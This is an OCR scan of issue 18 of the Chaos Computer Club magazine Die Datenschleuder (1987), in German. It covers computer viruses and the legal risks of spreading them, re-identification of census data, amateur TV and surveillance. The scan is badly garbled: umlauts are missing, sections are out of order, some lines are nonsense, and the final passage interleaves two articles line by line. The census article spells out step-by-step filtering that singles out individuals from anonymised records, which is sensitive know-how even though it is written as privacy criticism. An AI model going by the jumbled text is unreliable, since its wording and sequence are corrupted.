Isolierte Systeme bieten Saboteuren wenig Angriffsmglichkeiten. Ein isolierter Personalcomputer kommt jedoch selten vor. So werden beim Militr die Wechselplatten (u.a. Wang 20MB) aus der Zentraleinheit herausgenommen und im Tresor verschlossen. Aber auch dort besteht die Gefahr, da dem Anwender ein infiziertes Programm untergeschoben wird.

Teil 4

Juristische Hinweise zum Umgang mit ComputerViren

Keine "fremden" Programme


Einfach, aber unpraktikabel ist die Methode keinerlei Fremdsoftware auf dem Rechner zu starten, geschweige denn einzusetzen. Beim Kauf orginalversiegelter Programme ist eine Gefhrdung im Prinzip weitgehend ausgeschlossen. Kommerzielle Anbieter knnen es sich aus haftungstechnischen Grnden nicht leisten, Software mit virulenten Eigenschaften zu vertreiben.

Teil 3 Das Demoprogramm VIRDEM.COM (MS-DOS)


Auf dem CCC'86 wurde im Rahmen des VirenForums ein DemoVirus vorgestellt. VIRDEM.COM wurde von Ralf Burger entwickelt, um die Mglichkeit eines gefahrlosen Arbeitens mit Viren zu bieten. Das Demoprogramm mit Hinweistexten ist von der Redaktion zu beziehen (MS- DOS 360KB Disk oder ber Btx als Telesoftware). Das Programm verdeutlicht, wie hilflos ein Anwender gegenber Computerviren ist, wenn er nicht entsprechende Sicherheitsvorkehrungen trifft. Das Programm VIRDEM.COM ist ein relativ harmloses Virus, das Programme nicht zerstrt und nur auf Diskettenlaufwerk A zugreift. Das Virus erweitert seine Wirtsprogramme um eine zustzliche Funktion. Auerdem mutiert das Virus seine Funktion bis zur 9. Generation.

Gefahrdes Verschleppens
Es ist mglich, da ein Virus von einem infiziertem System durch den Servicehndler verschleppt wird. Ebenso ist unklar, inwieweit anwenderspezifische Programmpakete nicht durch Fahrlssigkeit des Hndlers oder Herstellers verseucht sein knnten. Vorsicht ist geboten bei Programmen, die z.B. aus Mailboxsystemen geholt oder von "Freunden" kopiert wurden. "Einem Programm - und damit letztlich dem ganzen DV-System - kann man nur genau soviel und genau so wenig Vertrauen schenken, wie dem, der es geschrieben hat". Zu dieser Erkenntnis kam der DATENSCHUTZBERATER (10/85).

Hilfe durch "Kontrolldatei"


Eine begrenzte Mglichkeit sahen Congressteilnehmer darin, ber ihre Datenbestnde eine Prfsumme anzulegen. Bei einem Virenbefall wrden dann die infizierten Programme erkannt werden. Jedoch mu bei dieser Methode eine vollstndige Isolation der Prfprogramme gewhrleistet sein. Ein Virus knnte sonst Prfsumme oder Prfprogramm gezielt angreifen. In diesem Zusammenhang erhielten wir von Ralf Burger Hinweise ber ein "Schutzprogramm" (MSDOS), welches unter anderem auf der Basis von Kontrolldateien arbeitet. Sobald dieses Programm seine Funktionssicherheit unter Beweis gestellt hat, werden wir darber berichten.

Die Thematik juristischer Konsequenzen beim Umgang mit ComputerViren wurde im Rahmen des VirenForums nicht detailliert behandelt. Die Diskussion auf der CLINCHMailbox zeigt allerdings eine unerwartete Resonanz zu diesem Thema. Im folgenden einige Auszge. Experimente mit ComputerViren
Experimente mit Computerviren bedrfen einer gewissen Sorgfaltspflicht. Gewissenhafte Programmierersollten sich nicht dem Vorwurf unlauterer Absichten fahrlssig aussetzen. "Man sollte auf jeden Fall darauf achten, da man keine Programme weitergibt, die ohne weiteres Zutun Dritter die wesentlichen Eigenschaften eines Virus entwickeln. Desweiteren sollte man Virus- Programme sicher aufbewahren, damit man dem Vorwurf entgeht, man habe einen spteren Tter damit zur Anwendung anleiten wollen. Ferner ist dafr Sorge zu tragen, da es demjenigen, der aus einem weitergebenen SOURCE-CODE schlielich das VirusProgramm generiert, nicht erspart bleibt, einen ausfhrlichen Hinweis auf die Gefhrlichkeit des Programmes, sowie die Tatsache, da der Autor ein Inverkehrbringen desselben ablehnt, zur Kenntnis zu nehmen."

Vorstzliche Manipulation
Da von den Herstellern kaum technische Zugriffsbeschrnkungen angeboten werden und diese auch nur selten von den Anwendern genutzt werden, stellt die berwachung der befugten Rechnernutzung ein bis heute nicht gelstes Problem dar. Neben ZugrifTsmglichkeiten durch Dritte sollte der Schulz vor bswilligen Mitarbeitern nicht vergessen werden. Sicherheitssensible Leiter von Rechenzentren lassen ihre Programmierer bei Ausspruch der Kndigung nicht mehr an die Rechner und ndern alle relevanten Fernzugriffsmglichkeiten.

Was tun Wenn?


Ohne einen umfassenden vorbeugenden Schutz vor ComputerViren ist es bei einem Virenbefall um die entsprechende Datenverarbeitungsanlage schlecht bestellt. In jedem Fall sollte keine Software mehr verbreitet werden. Ebenso mssen alle Tauschpartner umgehend informiert werden. Weiterhin sollten alle Datenbestnde von den Programmen getrennt gesichert werden. Die "verseuchten" Programmbestnde mssen isoliert werden und drfen ^keinesfalls mehr mit dem System genutzt werden.

DS Saite Zeen

SnfcitSdjicitScr

DS Saite Elph

Haftungsrechtliche Fragen
Eine der wichtigsten Fragen im Umgang mit Viren sind haftungsrechtliche Konsequenzen. Wir mchten hier nur einige Beispiele fr denkbare Ansprche der Opfer von Viren nennen und auf beweistechnische Probleme nicht weiter eingehen. "Fr Fehler (Bugs) in kommerziell verbreiteter Software haftet der Hersteller. Dieser Grundsatz deckt teilweise auch diejenigen Schden ab, die durch die Anwendung grob fehlerhafter Programme entstehen. Selbstverstndlich sind nur die Programmversionen von dieser Maxime gedeckt, die der Hersteller offiziell ausgeliefert hat. Demnach haftet der Hersteller schon dann nicht mehr in vollem Umfang, wenn der Anwendersich die Programme auf illegale Weise verschaft hat (Industriespionage, Softwarepiraterie) oder eine Version des Programms benutzt, die sich in der Struktur wesentlich vom ausgelieferten Orginal unterscheidet. Fazit: Keine Haftung des Herstellers bei Schden durch 'verseuchte' Programme. Der fr die Verbreitung eines Virus Verantwortliche mu nicht nur fr die Kosten aufkommen, die (wenn berhaupt mglich) die Wiederherstellung der Software erfordert, sondern auch fr die durch die brigen Aktivitten des Virus entstandenen Schden. Diese knnen die Schden in der Software weit bersteigen, ja mglicherweise einen Umfang annehmen, den keine Privatperson mehr abdecken kann."

Verffentlichung von Computerviren


Mailboxbetreiber, die Viren in ihren Systemen zum Abruf anbieten, sollten die Diskussion im Brett "Rcchtswesen" der CLINCH-Mailbox beachten. Dort werden weitere Hinweise auf die Problematik der Verffentlichung von Viren gegeben. "Eine Strafbarkeit (und zivilrechtliche Haftung) wegen der Verffentlichung von Virusprogrammen unter dem Gesichtspunkt der Anstiftung zur Datenvernderung (etc.) sollte ausgeschlossen sein, wenn kein - auch versteckter - Vorschlag gemacht wird, dieses Programm ohne Einwilligung auf fremde Computer zu portieren. Zustzlich wrde ich sicherheitshalber empfehlen, ein Virusprogramm nur zusammen mit einer erkennbar ernstgemeinten Warnung vor den tatschlichen und rechtlichen Folgen einer Portierung des lauffhigen Programmes zu verffentlichen. Bei Beachtung dieser Empfehlung halte ich die Verffentlichung von Virusprogrammen insoweit fr (rechtlich) unbedenklich." Wer mit Viren experimentiert, sollte sich der rechtlichen Konsequenzen bewut sein. Nicht nur der hfliche, sondern auch der vorsichtige Mensch behlt seine Viren daher vielleicht besser bei sich.

Teil5

Strafrechtliche Aspekte
Das grte Problem fr den Entwickler von Viren ist die strafrechtliche Relevanz seines Handelns. Das Entwickeln und anschlieende Verbreiten eines Programmes ist solange nicht strafbar, wie sich keine Straftatbestnde finden tessen. Da der Entwickler beim Virus am Schadenseintritt wiederholt mittelbar beteiligt ist, kommt hier Anstiftung oder Beihilfe zu den einschlgigen Straftaten in Betracht (allerdings bekanntlich mit derselben Strafdrohung, wie die Haupttat). Hier einige Leitstze, die eine Hilfestellung geben knnen. "Das Verhalten desjenigen, der einen Virus verbreitet (oder verbreiten lt) ist dann strafbar, wenn er den Eintritt eines Schadens verursachen will. Eine Strafbarkeit ist auch dann anzunehmen, wenn der Schadenseintritt fr wahrscheinlich gehalten und nichts zu dessen Abwendung unternommen wird. Problematischer ist der Fall, wenn ein Dritter, der die VirusRoutine erstmals vom Entwickler erhalten hat, sich entsprechend der ersten beiden Leitstze strafbar macht. Hier knnte der Entwickler dann mit zur Verantwortung gezogen werden, wenn dieser mit der Reaktion des Dritten rechnen konnte. Die Folgen des Einsatzes von ComputerViren sind unabsehbar und im Falle erfolgreicher Ermittlungen vom Verursacherzu tragen. Inwieweit der Entwickler zum Kreis der Verursacher zu rechnen ist, hngt vom Einzelfall ab; aufgrund seiner Kenntnisse obliegt ihm aber sicherlich eine besondere Sorgfaltspflicht." Soweit einige Hinweise fr experimentierfreudige Programmierer. Wer Viren vorstzlich auf fremden Computern ohne Zustimmung des Eigentmers verbreitet, verstt gegen eine Reihe von Gesetzen. Die strafrechtlichen Hinweise erscheinen uns unter Bercksichtigung der drohenden haftungsrechtlichen Ansprche fast schon als sekundr.

Ansichten und Einsichten der Diskussion iin PC-Virenforum

"Ich verfluche den Tag, an dem ich mir eine Festplatte zugelegt habe!". Erste Reaktionen auf das Wissen um ComputerViren. Whrend im ersten Block des Virenforums hauptschlich sachliche Informationen ber ComputerViren vermittelt und von den Teilnehmern ergnzt wurden, war fr den zweiten Teil eine Diskussion ber die Folgen und den Umgang mit ComputerViren geplant. Als die Bayrische Hackerpost im Frhjahr 1985 erstmals ber Compulerviren berichtete, stand die ComputerWoche Kopf und verglich Hacker mit der RAF. Eine Panikreaktion. Derartige Informationen aus solch einer Ecke sind wohl eher geeignet, kriminelle Potentiale zu entwickeln, war die Schlufolgerung" der ComputerWoche. Das Unverstndnis, dieses Thema zu bewltigen, fhrte zum Aufbau eines Feindbildes. Solchen Auswchsen wollte sich der C C C in seiner Informationspolitik nicht aussetzen. Deshalb setzte schon Mitte '86 eine Diskussion ber ethische Fragen beim Umgang mit ComputerViren ein. Ziel unserer Informationspolitik sollte nicht "Panikmache" oder das Heraufbeschwren einer Gefahr sein, sondern eine ffentliche Diskussion zur Vermittlung eines gesteigerten Unrechts- und Problembewutseins. Der Chaos Communication Congress wurde als Forum bestimmt. Der Congress bietet eine Atmosphre des Miteinanders, etwas, das auf kommerziellen Veranstaltungen unmglich ist: offene Diskussion ohne Vorbehalte.

nicht auerhalb der Gesetze steifen wollen, sondern eher einen Spielraum ausnutzen, um auf Gefahren aufmerksam zu machen.
S Saite Zw/ph

Im wesentlichen stellte sich die Frage: wie weit geht die Informationspolitik? Setzen wir uns bei der Verffentlichung eines SOURCE-CODES dem Vorwurf aus, Bauanleitungen fr logische Bomben zu verbreiten? In wieweit regen wir Nachahmungstler an? Stellt schon eine detaillierte Verffentlichung dieses Wissens eine Gefahr dar? Hier ergaben sich die unterschiedlichsten Betrachtungen. Festzustellen war. da Programmierer von ComputerViren mit ihrem Wissen bisher sehr verantwortungsvoll umgehen. Viele von ihnen fragen sich, was sie berhaupt damit machen sollen. Die Skrupel vor dem Vireneinsatz sind unterschiedlicher Natur. Ein Programmierer meinte: "Ich habe soviel Arbeit investiert, jetzt will ich auch sehen, was passiert" (auch die Atombombe mute ausprobiert werden). berwiegend sprachen die Congress-Teilnehmer sich gegen die bloe Verffentlichung von Programmquellcode aus. Und wenn, dann nur mit eindeutigen Informationen ber die Folgen und den Umgang mit ComputerViren. Einzelnen erschien schon die Beschreibung "berschreibender" und "nichtbcrschreibender" Viren als zu detailliert. Fast durchgngig forderten die Teilnehmer eine offene Informationspolitik. Die freie Forschung im Sinne des "Free Flow Of Information Act" soll helfen, positive Anstze zu entwickeln. "Veranstaltungen wie der C C C 8 6 erzeugen keine entscheidende Vernderung beim Umgang mit Computern. Sie vermitteln eher ein Bewutsein von der Tragweite des Handelns" formulierte ein Teilnehmer. Bisher wird, was ComputerViren betrifft, der Kreis der "Informierten" noch als sehr klein eingeschtzt. Da detaillierte Informationen ber ComputerViren Nachahmungstter anlocken, mu in Kauf genommen werden, wenn der schleichenden Entwicklung entgegengearbeitet werden soll. Die Geschichte hat gezeigt, wie gefhrlich es ist, Sicherheitsfragen von der offenen Diskussion unter Fachleuten auszunehmen. Die Affre um Sicherheit oder Unsicherheit des Geheimcodes der deutschen Fhrung im zweiten Welktkrieg ist als abschreckendes Beispiel oft genug erwhnt worden. Vielmehr erwarten Congressteilnehmerdie Einleitung einer ffentlichen Diskussion ber die "Restrisiken" neuer Technologien. Gerade die Popularitt des C C C , der seit jeher technikkritische Themen errtert, soll helfen, dieses Thema einer offenen Diskussion zuzufhren. Erstaunlich waren Thesen ber "WiderstandsViren". So sahen einige Congressteilnehmer in ComputerViren ein legitimes Mittel zum Volkswiderstand gegen unmenschliche, zentralisierte Grossrechenzentren. Auch deuten einige Hinweise aus der Scene auf einen Virusangriff gegen die Volkszhlung hin. Parallelen zum Science Fiction-Roman "Der Schockwellenreiter", in dem John Brunner (Heyne SF 3667) schon 1975 das Bild einer computerabhngigen Welt zeichnete, die durch ein "Wurmprogramm" befreit wird, sind erkennbar. Frankreich entschied sich im Gegensatz zur B R D bewut gegen die Einfhrung eines maschinenlesbaren Ausweises. Der Grund: Demokratische Systeme bentigen einen Spielraum, der Widerstand gegen diktatorisches Takeover ermglicht. So wurde die Forderung laut, dieses technisch spezialisierte "Herrschaftswissen" auch als "WiderstandsWissen" zu frdern. Dem entgegen stand der berwiegende Teil der Besucher m i t der Auffassung, da Hacker s i c h

Weitgehend unbercksichtigt blieb in den Diskussionen das Potential krimineller Krfte, die sich Vorteile durch den Einsatz von Viren verschaffen knnten. Weiterhin drfen politische Gegner, sowie Geheimdienste und terroristische Gruppen bei der Gefahrenabschtzung nicht vergessen werden. Wo konomische oder ideologische Beweggrnde vorliegen, ist die Gefahr einer VirusAttacke weitaus wahrscheinlicher als aus den Reihen der privaten Computeranwender. Diese handeln viel eher verantwortungsbewut. So wurden Forderungen laut, da ComputerSysteme, die personenbezogene Daten verarbeiten oder hochkritische Steuerfunktionen (zB. in Atomkraftwerken) bernehmen, absolut virensicher sein mssen. Andernfalls darf man derartige Aufgaben nicht solchen anflligen Technologien berantworten. Weiterhin mu eine ethische Barriere gegen den Computermibrauch, aber auch gegen den fahrlssigen Computergebrauch aufgebaut werden. Folgend sollen Forschungsergebnisse die Entwicklung von Abwehrmechanismen ermglichen. Die Erhhung der "Risikoschwelle" (schnellere Entdeckung) ist jcdoch nur eine technische Hilfe, die weiterhin ein "Restrisiko" aufweist. "Das Problem sind nicht die ComputerViren, sondern die Katastrophen, die durch die Abhngigkeit von Technologien entstehen", so die Schlufolgerung eines Congress-Teilnehmers. Nach Jahren bedenkenloser Technologieglubigkeit forderten die ersten technischen Mcga-Katastrophen (Bhopal, Tschernobyl, Basel) ihre Opfer. Der CCC fordert seit langem eine sozialvertrgliche Gestaltung von Technologien. Die unvertrgliche Verbraucherhaftung bei Mibrauch von Bildschirmtext oder Euroscheckkarten waren einige kritische Anstze aus der letzten Zeit. Die ComputerViren stellen nun eine neue, uerst brisante Erscheinung im Krftespiel moderner Techniken dar. Wissenschaftler errtern seit einiger Zeit "The Ultimate Error Message", den Weltkrieg durch einen Computerfehler. Die Aufarbeitung des CCCongress'86 anhand einer Videodokumentation zeigt bisher unerrterte Bereiche auf. Die Redaktion geht davon aus, da in den nchsten Monaten weiteres Material ber ComputerViren verffentlicht wird, Der CCC veranstaltet daher am 18. und 19.April '87 ein weiteres VirenForum. Ein Anmeldeformular erscheint in der D A T E N S C H L E U D E R 19. (Zum April wird auch die Videodokumentation ber den CCC'86 fertiggestellt sein.)

SMfcitrfjfcitiicr

$rtfciirf)lcHtcr

DS Saite Dralzeen

pajpunH xis AjuaMX iogsi|qn,j pue joiipg

(BVerfG'83, S. 52/53). Interessant ist die Forderung des Gerichtes nach ffentlicher sachlicher Information auch ber die Art der statistischen Datenverarbeitung, "da Abschottung statt Information zu Mitrauen und mangelnder Kooperationsbereitschaft fhren wrde" (BVerfG'83, S. 54) Jetzt stellt sich natrlich die Frage, was der C C C mit der ganzen Sache zu tun hat. Nun, erstens interessiert die Redaktion von vornherein alles, was irgendwie nach Mibrauch von Macht mittels des Werkzeugs Computer riecht. Zweitens ist so ein Urteil des Bundesverfassungsgerichtes ja ganz nett, aber wenn die Kontrollinstanzen fehlen, welche die Durchfhrung eines solchen Urteils berwachen, ist Jedermann aufgerufen, das Seine dazuzutun, um Schaden von diesem unseren Volke abzuwenden. Drittens haben wir im Rahmen des Chaos Communication Congress 1986 Material erhalten, das uns geradezu verpflichtet, tatig zu werden. Am Institut fr Informatik der Universitt Hamburg wurden in den letzten Monaten umfangreiche Studien durchgefhrt, die zweifelsfrei belegen, da die mit der Volkszhlung 1987 gewonnen Daten, entgegen der eindeutigen Forderung des Verfassungsgerichtes, eben nicht 'faktisch anonym' sind, sondern sehr wohl, und recht einfach, eine Identifizierung des Dateninhabers ermglichen. Den - wahrscheinlich neuen - Begriff des D A T E N I N H A B E R S benutzen wir hier sehr bewut, um deutlich zu machen, da es in einer Informationsgesellschaft auch ein Grundrecht auf informationelle Selbstbestimmung geben mu. Und das fngt eben damit an, da jeder Einzelne selbst bestimmt, wer welche Daten ber ihn sammelt und benutzt. Die unter der Leitung von Professor Klaus Brunnstein durchgefhrten Versuche zeigen erschreckend deutlich, mit welch einfachen Mitteln es mglich ist, aus den angeblich anonymisierten, d. h. nicht mehr personenbezogenen Daten wieder personalisierte Daten zu machen. Grundlage der Versuche war eine knstliche Volkszhlungsdatei, die ausschlielich Daten enthlt, wie sie bei der Zhlung 1987 anfallen werden, ohne die momentan laufende Stammdatenerhebung bei den Hausbesitzern und Arbeitgebern auch nur annhernd einzubeziehen, so da letztlich die Angaben, die jeder einzelne von uns macht, es ermglichen, wieder auf jeden Einzelnen zu schlieen. Brunnsteins Studie zeigt einwandfrei, da es mit einem einfachen Werkzeug, wie dem Datenbanksystem DBase III unter MS-Dos, mglich ist, mit wenigen Filtervorgngen ganz konkrete Einzelpersonen aus einem Datenberg von 100 000 Datenstzen herauszufischen. Bei 60 Millionen Datenstzen braucht man halt nur eine grere Festplatte und entsprechend mehr Zeit... Wir wollen die Vorgehensweise zur Reanonymisierung von Volkszhlungsdaten anhand eines Beispiels deutlich machen: Zielgruppe des Versuchs sind 46jhrige Mnner aus der Brobranche. Unser erster Schritt ist also konsequenterweise der, zuerst nach dem Geburtsjahr zu filtern. Es bleibt eine Datei mit 915 Personen brig, die 1940 nach dem Stichtag der Volkszhlung geboren wurden. Diese Datei filtern wir nach dem Geschlecht und erhalten eine Datei mit 443 Personen, die wir auf das Merkmal Erwerbsttigkeit prfen. brig bleiben 386 mnnliche Erwerbsttige von 46 Jahren. Brokrfte haben die Schlsselnummer 78, also suchen wir jetzt danach und erhalten eine Datei, die nur noch 26 Personen enthlt. Wir

Fr eine Handvoll Daten


De-Anonymisierung des gezhlten Volkes Es begab sich aber zu der Zeit, da ein Gebot ausging von dem Kaiser Augustus, da alle Welt sich schtzen liee (Chaos-Textbaustein 42). So wurde zu biblischen Zeiten die Tatsache dokumentiert, da jede Regierungsform Informationen ber die Regierten bentigt, also Daten, anhand derer man Entscheidungen fr die Zukunft treffen kann. Dieses legitime Bedrfnis findet sich heutzutage wesentlich prosaischer formuliert im Volkszhlungsgesetz wieder. Indula (Textbaustein aus dem CDUTextsystem ; bedeutet 'in diesem unseren Lande') werden traditionell Erhebungen durchgefhrt, die aufschlureiche Daten zur Befriedigung des Informationshungers der Behrden und der Wirtschaft liefern sollen. Bekanntlich wurde - nach groen ffentlichen Protesten - die ursprnglich fr 1983 vorgesehene Volkszhlung durch ein Urteil des Bundesverfassungsgerichtes gestoppt und den Verantwortlichen eindringlich klargemacht, zu welchen Bedingungen eine knftige Zhlung machbar sei: Es sei zu "prfen, ob eine Totalerhebung trotz einer inzwischen fortgeschrittenen Entwicklung der statistischen und sozialwissenschaftlichen Methoden noch verhltnismig ist" (BVerfG'83, Seite 59). Darber hinaus bedrfe es einer "mglichst frhzeitigen, faktischen Anonymisierung, verbunden mit Vorkehrungen gegen eine Deanonymisierung"

sollten uns dabei deutlich vor Augen halten, da wir nur drei Merkmale brauchten, um aus 100 000 Datenstzen einige wenige herauszufischen. Der nchste Schritt besteht darin, die 'Wirtschaftsabteilung' zu sondieren. Wir erhalten elf Datenstze, die wir auf das Merkmal Schulabschlu prfen. Ergebnis: fnf Volks- bzw. Realschler. Zustzlich Tragen wir, wer davon einen Berufsfachschulabschlu hat, brig bleiben drei Kandidaten. Wir haben bislang erst sechs signifikante Merkmale untersucht, werden aber trotzdem hinterhltig und fragen uns: was wissen wir denn sonst so ber die Drei? ber das Merkmal 'gemeinsamer Haushalt' knnen wir weitere Schlsse ziehen (Das Volkszhlungsgesetz 1987 schreibt ausdrcklich vor, da "die Zusammenhnge zwischen Personen und Haushalt, Haushalt und Wohnung, Wohnung und Gebude . . . festgehalten" werden, was beim Gesetz zu Zhlung '83 nicht der Fall war). Wir knnten nun also noch feststellen, da Herr A ledig und religionslos ist und in einem Einzelhaushalt lebt. Damit ist er nun aber wirklich eindeutig reanonymisiert, denn B und C sind verheiratet und ber ihre Ehepartner eher noch leichter reanonymisierbar. Zusammen mit der Tatsache, da auch eine Information vorhanden ist, anhand derer der sogenannte Block des Dateninhabers feststellbar ist (Blcke sind die kleinste Einheit von Datensatzmengen. Sie begrenzen die Datenstze von Personen, die in einer Straenfront zwischen zwei Einmndungen von Nebenstraen wohnen), wird nun leicht vorstellbar, warum Herr A sptestens 1989 Werbung von einem Heiratsvermittler bekommt, whrend Herr B davon verschont bleibt. Der Forderung des Bundesverfassungsgerichts wird also mit der Volkszhlung 1987 in keiner Weise Rechnung getragen. Faktische Anonymisierung bedeutet nunmal, da eine Reanonymisierung nur mit unverhltnismig hohem Aufwand mglich sein darf. Schon durch die Art der erhobenen Daten wird eine Entscheidung, die unsere hchste verfassungsmige Instanz getroffen hat, schlicht ignoriert. Abschlieend noch einige Zitate aus der Studie, die wir unkommentiert lassen, da sie frsich sprechen: "Bei diesen Ergebnissen ist zu bercksichtigen, da wesentliche Merkmale der Volkszhlung, die eine Identifizierung noch erleichtern, etwa die Adresse des Arbeitgebers oder der Ausbildungssttte, in den Re-Identifizierungs-Versuchen nicht einmal benutzt wurden." "Erstens: Es gibt kaum Personen innerhalb des Datenbestandes. die nicht anhand der ber sie gespeicherten Merkmale re- identifizierbar wren. Zweitens: Mehr als die Hlfte aller Erwerbsttigen knnen schon mit wenigen Merkmalen . . . re-identifiziert werden" " . . .da die Organisation der Statistik als interne Aufgabe der Exekutive angesehen wird, gibt es praktisch keine Kontrollinstanz. "So sind die Prsidenten der Statistischen mter die letzten wahren, weil unkontrollierten Knige dieser Republik." Alle Zitate und das Re-ldentifizierungsbeispiel stammen aus: "Mitteilung Nr. X X ber Mglichkeiten der Re-ldentifikation von Personen aus Volkszhlungsdaten" von Klaus Brunnstein, Hamburg; Dezember 1986. (Die Studie sowie Beispieldaten und die Re-ldenfikationsprogramme knnen ber die DATENSCHLEUDER-Redaktion bezogen werden). gobiin

KL.F.lN*Meig*

Dirk aus Berlin, der an der Diskussion Samstag Nacht auf dem CCCongress teilgenommen hat: die Moderatorin mchte Dich treffen. Bitte hinterlass Deine Tel-Nr. fr Ingrid beim ALBuero 861 4449.
Blut spenden, Leben retten

Fleisch- & Wurstwaren GmbH


I i i } 52i"Bereirhafi!poliiei - heute -

"Marx

Radio Bremen ist auf dem CCCongress'86 eine Videocassette (Umatic) abhanden gekommen. Erkennungsmerkmal: Kassette ist zu gro fr VHS-Rekorder. Mgliche Finder bitte whrend der ffentlichen Chaosdienstzeiten Di-Do 12-15 unter 040-490 37 57 melden.

Hackersets

(So lange der Vorrat reicht)

fite

CPM-Portable EPSON PX8, 64 KB, Microcassette, Display 80 * 11, mit Akku und Garantie aus Sonderposten D M 870,- fr CCC-Mitglieder (notfalls gleichzeitig beantragen) Versand erfolgt als Wertpaket nach Eingang eines VSchecks an den C C C , LS PX8, Schwenckestr. 85, 2000 HH 20.

fSSSs
4

i/faSsu

6i,IS44i
9037 ST

IMPRESSUM
"3)ic SniciiSrijlcniict Numero 18
Das wissenschaftliche Fachblatt fr Datenreisende

D-2000 Hamburg 20 Schwenckestrasse 85


G e o n e t : Geol:Chaos-Team Btx : 6 5 5 3 2 1 # Herausgeber und ViSdPG: Herwart Holland-Moritz Mitarbeiter (u.a.): R. Schnitzki, S. Wernery, A. Eichler, P. Franck, H. Gruel, M . Kuelin, Esco, Andy M.-M., S. Stahl, padeluun. KS, jwi, D. Wintschnig, Poeironie; Rhein/Main: Erich Engeiter sowie die ungenannten Geheimnistrger, (c) 19K7 bei der Redaktion und den Autoren Vielfarb-Kartoffeleigendruck im Selbstverlag. Felirutir 1987 - Made in Eile
DS Saite Fmfzeen

DS Saite Viazeen

^ f ^ S i c ' S n fcnSrfjfcitbcr

^ f f ^ r S i c Snteiidifjtciiiici-

WIKG

"S

Wirtschaftsspionage
Real Hacking
Bombenstimmung beim CCC'87

2. W I n s c h a f t s K r i m i n a l i t t s G e s e t z / ^ \ ^

BiFu
Bild und Funk auf dem CCC'86 Wie in jedem Jahr auf dem Chaos Comunication Congress waren die Funkamateure wieder mit Bild und Funk vertreten. Schwerpunkte wie Packel Radio wurden in vorausgegangenen DATENSCHLEUDERN ausfhrlich abgehandelt. Erstmals auf einem CCCongress war die Amateurfunkfernseh- Empfangsanlage (ATV-Anlage), die von DL1HK zur Verfgung gestellt worden war. Im wesentlichen besteht sowas aus einer Antenne fr das 23 cm-Band, einem Converter, der die Signale ins normale TV-Band umsetzt und einem Fernseher mit Kabeltuner. Mit dieser Mimik gelang es (trotz schlechter Antennenlage), ein verwertbares Farbbild vom ATVRelais (Sendeleistung nur ca. 30 Watt) auf den Screen zu bekommen. Dazu war nichtmal ein Composter ntig! Wenn kein Amateur ber das Relais arbeitet, sendet es automatisch einen aktuellen Ausschnitt vom Meteosat-2-Wetterbild im Wechsel mit einem Testbild oder einem Auenbild einer Kamera, die beim Relais angebracht ist. Der eigentliche Witz des Relais liegt darin, da auch ein Amateur, der selbst keine Bildbertragung machen kann, sich mit einem 70 cm-Funkgert auf den Tontrger aufschalten und so seine Kommentare zu den gezeigten Bildern abgeben kann. D O XI war so frei, whrend der Veranstaltung als Ansprechpartner zu dienen und sozusagen auf Abruf eine Stationsbeschreibung (im Hackcenter herrscht gegen den Kabelsalat richtig Ordnung) live einzuspielen oder Amateur-Videotapes zu senden. Krieg der Sterne zeigen ist zwar ohne weiteres machbar, aber nicht erlaubt (AFuG, (c) und so). Fr den CCC'87 hat DC1XI in Aussicht gestellt, entweder vom Congress live zu senden (so die Technik will), oder aber kurze Tapes von zu Hause einzuspielen. Mal sehen ob's klappt - frei nach dem Motto: Hier ist (DLO)CCC mit eigenem TV-Programm.

Da das 2.Wirlschaftskriminalitlsgcsctz (WIKG) zum ersten August'86 in Kraft trat, war es natrlich Gesprchsgegenstand eines CCCongress-Workshops. Unter Leitung des BHP'lers Sponti wurde ber die Auswirkungen und die Zukunft der Hacker diskutiert. Einig war man sich, da NUI-Mibrauch als "Tuschung im Datenverkeht" strafbar, und es noch unklar ist, wo die Grenze zu ziehen ist zwischen Daten, welche legal abgerufen werden knnen, und denen, welchc nicht legal British Telecom Is Watching You abrufbar sind. Ist beispielsweise das Prompt, oder die Meldung, um wessen System es sich handelt, bereits sicherheitsrclcvant? Ist eine normale ID & Pawort-Sperre bereits als Mnchen (bhp/ds) - Vertrauliche geschftliche In"besonderer Schutz" zu verstehen? Wichtig auch die formationen ber europische Industriefirmen, erInformation, da die ALTOS-Box jedes Einloggen und langt durch berwachungszentren der US-AmerikaAusloggcn s Vorgang mit allen dabei anfallenden Danischen Streitkrfte in Europa, werden an konkurrieten protokolliert, bislang nur zur Ausmerzung von rende Firmen in den USA bermittelt. Dies geht aus Software-Bugs, in Zukunft aber - mit Zustimmung der Firma ALTOS, der wohl nichts anderes brig blieb - auf einem krzlich verffentlichen Buch zu diesem Thema hervor. Veranlassung der Behrden, nachdcm eine RckverDer Verfasser, ein frherer Mitarbeiter der US-Luftfolgung stattfand, bei der sich jemand mit einer Leihwaffe, beschreibt darin, wie die Telekommunikation NUI bei ALTOS cingcloggt hatte. in mehreren Staaten der Europischen Gemeinschaft Um die Argumentation der Juristen und die Auswirberwacht wird und wie den US- Firmen fertig aufbekungen und - legungen des 2.WIKG genauer kennenreitete Informationen zugnglich gemacht werden. zulernen, bitten wir jeden, der aufgrund des 2.WIKG in Dieser Teil der berwachung berwiegt demnach bei Schwierigkeiten gert, sich bei uns zu melden, damit wir weitem das Abhren des sowjetischen Militrfunkuns informieren knnen. verkehrs, beschreibt Duncan Campbell in seinem Auf der Veranstaltunfg wurde auch die Auffassung verBuch "The Unsinkable Aircraft Carrier" (der untreten, da die Hacker - als kleine Fische - Studien- und sinkbare Flugzeugtrger; d. bers.). Tom Litterick, bungsobjekte der LKA's sind, die daran Erfahrungen Abgeordneter des britischen Parlaments, beschuldigsammeln fr die Bekmpfung wirklicher Wirtschaftste daraufhin die Vereinigten Staaten der "WirtkrimincUcr. Derzeitiger Stand der Dinge sei zwar, da schaftsspionage". die meisten Ermittlungsbeamten bei Hausdurchsu"Die wichtigste Station fr die gegenseitige Sicherchungen wenig bis gar keine Ahnung htten (so kam es heit in der Welt", so ein frherer Direktor der US Navor, da leere Diskettenhllen und -schachteln mitgetional Security Agency, liegt in Menwith Hill in der nommen wurden), da aber die Beamten in den LKA's, Grafschaft Yorkshire, Grobritannien. Einige 10.000 die dann den Fall weiterbearbeiten, sehr wohl wissen, Telefonleitungen laufen dort zu der nahegelegenen was sie tun. Man sollte also nicht auf deren Unkenntnis Relaisstation der britischen Telefongesellschaft Brisetzen! tish Telecom. Menwith Hill wird auerdem durch einen Hohlleiter versorgt, der bereits vor seiner MoLs I I I dernisierung vor zwei Jahren eine Kapazitt von 32.000 Telefongesprchen gleichzeitig hatte. Grobritannien ist einer der Hauptzugnge fr Datenleitungen von Ost- und Westeuropa nach Afrika sowie Schn wr's Nord- und Sdamerika. Die "Spezialitt" der Station in Menwith ist das Anzapfen der fest gemieteten Standleitungen der europischen 